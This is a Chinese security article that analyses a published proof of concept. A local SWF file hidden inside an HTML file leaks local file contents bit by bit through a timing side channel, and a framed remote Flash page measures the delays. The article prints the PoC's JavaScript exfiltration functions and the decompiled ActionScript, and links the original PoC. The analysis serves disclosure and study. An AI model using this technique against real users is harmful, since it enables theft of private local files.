技术分析:本地SWF文件可将任意本地文件泄露

安全 应用安全
Flash文件在设计的时候就允许本地的swf文件读取任意的本地文件。Flash Player版本不高于7时,本地SWF文件可与其它SWF文件交互并且可以从任何远程或本地位置加载数据。

Flash文件在设计的时候就允许本地的swf文件读取任意的本地文件。Flash Player版本不高于7时,本地SWF文件可与其它SWF文件交互并且可以从任何远程或本地位置加载数据。

原理

在Flash Player 8 和更高版本中,SWF 文件不能连接本地文件系统和 Internet。 但是通过时间旁路通道(timing side-channel),却可以实现提取任意本地文件的内容并传送到网络上(详细说明,可参见[1],[2])。

Google浏览器会阻止(应该是有提示吧)下载“.swf”后缀的文件,来降低对本地文件系统规则的攻击,但是却没有阻止swf文件以不同的文件后缀嵌入进去(poc中,是html和swf文件合并了,所以是嵌入html中[3])。当多个swf文件运行在同一个浏览器,但在不同的frame下,或者不同的tab下时,一次只有一个swf文件可以运行ActionScript脚本。

这也就意味着,本地的swf文件可以通过耗时的操作(如直接循环一个时间段等),使加载的网络上的swf文件的外部接口调用(ExternalInterface call)出现延迟。这样根据读取的本地文件的信息(如读取一个字节时,bit位为1出现延迟,bit位为0,不设置延迟),决定是否出现相应的延迟,网络上的swf文件检测这一延迟,即可获取到读取的文件信息。

本地html文件显然不能直接和网络上的swf文件进行交互,但是本地的html文件可以通过frame加载网络上的swf文件。

POC分析

原作者提供的poc分析 ([4],[5]),打开后发现乱码,winhex一看,果断嵌入了swf文件(提供的poc代码中没有这个swf文件,如图1),偏移0xd65后的内容为html文件的内容:

技术分析:本地SWF文件可将任意本地文件泄露于互联网 

技术分析:本地SWF文件可将任意本地文件泄露于互联网

0xD65后的内容极为html文件的内容。

看了下作者html中的js代码:

/* check the response time of flash */
         function ping(cb) {
         var l;
         window.addEventListener(,message,, l = function(e) {
         window.removeEventListener(,message,, l);
         //console.log(,got delay ,+e.data.delay)
         cb(e.data.delay);
         });
         document.getElementById(,ifr,).contentWindow.postMessage(,ping,, ,*,);
         }
         
         /* steal one bit */
         function getbit(path, char, mask, cb) {
         path = encodeURIComponent(path);
         document.getElementById(,div,).innerHTML =
         ,<embed type=application/x-shockwave-flash src=? flashvars="path=,+path+,&amp;char=,+char+,&amp;mask=,+mask+,">,;//这个地方应该就是[3]提及的那个bug,src换位本地的地址后,poc没能成功读取本地文件内容//作者将本地的swf文件和html文件合并在一起了,path为文件路径
         setTimeout(function() {
         ping(function(res) {
         setTimeout(function() {
         cb(res > 100);//根据延迟得到bit位的值
         }, 500);
         });
         }, 200);
         }
         
         /* steal one byte */
         function getbyte(path, char, cb) { 
         var byte = 0;
         var mask = 1;
         function getbyte_() {
         //console.log(,getbyte_ mask=,+mask)
         getbit(path, char, mask, function(is_set) {//根据mask的那一bit为1,决定读取char中的某一bit位
         //console.log(,mask=,+mask+, set=,+is_set);
         if (is_set) byte |= mask;if (mask == 0x80) return cb(String.fromCharCode(byte));
      mask <<= 1;
      getbyte_();
    });
    /* steal an entire file */function run() {
  var path = document.getElementById(,path,).value;
  console.log(,path=,+path)
  var i = 0;
  var text = ,,;
  function run_() {//其实这里应该有个判断文件长度的,当然应该由swf文件把文件长度信息返回回来
    getbyte(path, i, function(char) {
      console.log(,got char: ,+char)
      text += char;
      i++;
      document.getElementById(,out,).innerText = text;
      run_();
    });
  }
  run_();}

从作者给的html文件中提前swf后反编译,反编译后在swf脚本下有class_writer这一项:

技术分析:本地SWF文件可将任意本地文件泄露于互联网

里面的主要两个函数的代码:

public static function completeHandler(arg1:flash.events.Event):void
        {
            var loc1:*=0;
            if ((Writer.loader.data.charCodeAt(Writer.char) & Writer.mask) != 0) 
            {//该bit位为1则循环,因此会出现延迟
                loc1 = flash.utils.getTimer() + 400;
                do 
                {
                }
                while (flash.utils.getTimer() < loc1);
            }
            return;
        }
 
        public static function main():void
        {
            Writer.timer = new haxe.Timer(1);
            Writer.timer.run = function ():void
            {
                var loc1:*;
                var loc2:*=null;
                var loc3:*=undefined as null;
                var loc4:*=undefined as null;
                if (flash.Lib.current.stage != null) 
                {
                    false;
                }
                if (false) 
                {
                    Writer.timer.stop();
                    loc2 = flash.Lib.current.loaderInfo.parameters;
                    Writer.path = loc2.path;//文件路径
                    Writer.char = Std.parseInt(loc2.char);//获取哪一字节的数据
                    Writer.mask = Std.parseInt(loc2.mask);//与之按位与,可确定获取的bit位的值
                    loc3 = new flash.net.URLRequest(Writer.path);
                    Writer.loader = new flash.net.URLLoader();
                    Writer.loader.addEventListener(flash.events.Event.COMPLETE, Writer.completeHandler);
                }
                return;
            }
            return;
        }

Frame中嵌入的html文件的js代码:

<embed id=a src=ping.swf AllowScriptAccess=always><script>
  window.addEventListener(,message,, function(e) {
    var t1 = Date.now();
    document.getElementById(,a,).ping();
    var t2 = Date.now();
    parent.postMessage({delay:t2-t1}, ,*,);//计算网络上的swf文件相应的延迟
  });</script>

作者poc google浏览器下运行效果:

技术分析:本地SWF文件可将任意本地文件泄露于互联网

 

相关资料

[1]:http://help.adobe.com/zh_CN/AS2LCR/Flash_10.0/help.html?content=00000456.html

[2]:http://help.adobe.com/zh_CN/AS2LCR/Flash_10.0/help.html?content=00000462.html#164081

[3]: https://code.google.com/p/chromium/issues/detail?id=487475(无奈翻墙了提示我不能查看)

[4]https://var.thejh.net/flash_HigNabIalOt6/download.html(原作者的poc)

[5]:https://var.thejh.net/flash_local_poc.zip(原作者的poc 代码)

[6]:http://seclists.org/fulldisclosure/2015/May/122

责任编辑:蓝雨泪 来源: FreeBuf
相关推荐

2017-01-01 09:43:40

2024-05-06 06:00:00

C#文件存储

2020-05-20 08:57:14

JavaScript读取文件开发

2011-11-17 15:18:50

HTML 5

2011-04-20 09:20:00

Windows 8

2017-12-01 10:13:42

前端操作上传

2009-11-27 09:22:32

JavaScript本

2024-03-14 10:51:13

服务器技术.NET Core

2013-07-30 12:30:57

Windows PhoWindows Pho

2023-11-11 19:43:12

缓存数据库

2010-07-27 13:46:18

Flex swf

2019-06-17 15:00:48

Node.jsPDF前端

2015-04-02 16:26:39

漏洞检测工具Kadimus

2013-05-27 14:46:06

文件系统分布式文件系统

2022-04-11 06:56:14

数据库安全数据泄露

2017-03-20 20:32:56

谷歌开源JPEG算法

2010-10-12 09:17:42

本地代码Native CodeNative Clie

2019-01-03 15:20:36

dbxfsLinux文件夹

2015-01-14 10:49:53

大文件备份重复数据删除技术云端

2018-12-19 08:52:55

无文件攻击信息安全恶意代码
点赞
收藏

51CTO技术栈公众号